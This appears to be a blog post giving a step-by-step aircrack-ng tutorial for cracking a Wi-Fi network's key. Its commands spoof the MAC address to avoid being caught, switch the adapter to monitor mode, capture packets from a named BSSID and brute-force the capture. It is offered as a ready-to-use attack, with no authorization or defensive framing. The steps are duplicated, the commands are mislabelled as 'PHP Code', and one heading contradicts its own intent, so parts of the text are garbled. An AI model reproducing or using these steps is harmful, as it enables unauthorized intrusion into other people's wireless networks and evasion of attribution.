First of all install the aircrack-ng package using yum command
----------------------------------------------------------------------------
Step 1:
-----------------------------------------------------------------
Install the macchanger package using yum command
-----------------------------------------------------------------
Step 2:
-------------------------------------------------
Check wireless adapter and thier name
-------------------------------------------------
Step 3:
-------------------------------------------------------------------
Then stop the wireless lan card by using this command
-------------------------------------------------------------------
Step 4:
----------------------------------------------------------------
Change Mac Address So That You Can Get Caught
----------------------------------------------------------------
Step 5:
-------------------------------------------
Again, start your wireless adapter
-------------------------------------------
Step 6:
-------------------------------------------------------------
To see available Wi-Fi Network use this command
-------------------------------------------------------------
Step 7:
------------------------------------------------------------------
Now, You Have To Capture the Data Packets in a file
------------------------------------------------------------------
Step 8:
-------------------------------------------------------------------------------
After Capturing 20,000 packets, Start Bruteforcing on captured file
-------------------------------------------------------------------------------
Step 9:
----------------------------------------------------------------------------
Step 1:
PHP Code:
yum install aircrack-ng -y -----------------------------------------------------------------
Install the macchanger package using yum command
-----------------------------------------------------------------
Step 2:
PHP Code:
yum install macchanger -y -------------------------------------------------
Check wireless adapter and thier name
-------------------------------------------------
Step 3:
PHP Code:
airmon-ng -------------------------------------------------------------------
Then stop the wireless lan card by using this command
-------------------------------------------------------------------
Step 4:
PHP Code:
airmon-ng stop wlan0 ----------------------------------------------------------------
Change Mac Address So That You Can Get Caught
----------------------------------------------------------------
Step 5:
PHP Code:
macchanger --mac 00:11:22:33:44:55 wlan0 -------------------------------------------
Again, start your wireless adapter
-------------------------------------------
Step 6:
PHP Code:
airmon-ng start wlan0 -------------------------------------------------------------
To see available Wi-Fi Network use this command
-------------------------------------------------------------
Step 7:
PHP Code:
airodump-ng mon0 ------------------------------------------------------------------
Now, You Have To Capture the Data Packets in a file
------------------------------------------------------------------
Step 8:
PHP Code:
airodump-ng -c 6 -w innobuzz --bssid 00:1E:40:59:B6:58 mon0 -------------------------------------------------------------------------------
After Capturing 20,000 packets, Start Bruteforcing on captured file
-------------------------------------------------------------------------------
Step 9:
PHP Code:
aircrack-ng innobuzz-01.cap "I want to change the world, but nobody gives me the source code"
No comments:
Post a Comment